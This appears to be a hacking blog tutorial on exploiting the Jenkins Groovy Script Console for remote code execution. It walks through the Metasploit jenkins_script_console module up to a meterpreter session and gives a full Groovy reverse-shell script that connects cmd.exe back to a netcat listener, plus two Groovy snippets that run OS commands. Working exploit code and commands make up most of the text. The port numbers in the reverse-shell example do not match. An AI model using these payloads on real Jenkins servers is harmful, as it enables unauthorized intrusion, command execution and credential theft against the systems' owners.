Hello Friends!! There were so
many possibilities to exploit Jenikins however we were interested in Script
Console because Jenkins has lovely Groovy script console that permits anyone to
run arbitrary Groovy scripts inside the Jenkins master runtime.
Table of Content
§ Jenkin’s Groovy Script Console
§ Metasploit
§
revsh.groovy
§
Groovy executing shell commands -I
§
Groovy executing shell commands -II
Jenkin’s Groovy Script Console
Jenkins features a nice
Groovy script console which allows one to run arbitrary Groovy scripts within
the Jenkins master runtime or in the runtime on agents. It is a web-based
Groovy shell into the Jenkins runtime. Groovy is a very powerful language which
offers the ability to do practically anything Java can do including:
§ Create sub-processes and execute arbitrary commands on
the Jenkins master and agents.
§ It can even read files in which the Jenkins master has
access to on the host (like /etc/passwd)
§ Decrypt credentials configured within Jenkins.
§ Granting a normal Jenkins user Script Console Access
is essentially the same as giving them Administrator rights within Jenkins.
Metasploit
This module uses the
Jenkins-CI Groovy script console to execute OS commands using Java.
use
exploit/multi/http/jenkins_script_console
msf
exploit(jenkins_script_console) > set rhost 192.168.1.106
msf
exploit(jenkins_script_console) > set rport 8484
msf
exploit(jenkins_script_console) > set targeturi /
msf
exploit(jenkins_script_console) > set target 0
msf
exploit(jenkins_script_console) > exploit
Metasploit uses command
stager to exploit against command injection.
Hence, you can observe, that it has given meterpreter
session of victim’s machine.
revsh.groovy
Suppose if you found Jenkins without login password or
you are a normal user who has permission to access script console then you can
exploit this privilege to get reverse shell of the machine. At Jenkins
Dashboard go to Manage Jenkins and
then select Script Console.
At script console, you have full privilege to run any
program code, therefore I try to execute following piece of code which I had
taken from Github
to get reverse connection on my local machine via netcat listener.
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new
ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new
Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(),
si=s.getInputStream();OutputStream
po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try
{p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
nc -lvp 1234
Once the above script will be executed, it will give netcat
session of victim’s machine.
Groovy executing shell commands -I
Similarly with the help of following piece of code which
I found from this here,
I try to create RCE for executing OS command through groovy script console.
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'ipconfig'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
Groovy executing shell commands -II
Similarly, I found another very small piece of code to
exploit Groovy Console from here, which will generate
RCE and execute shell command.
def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}");
0 comments:
Post a Comment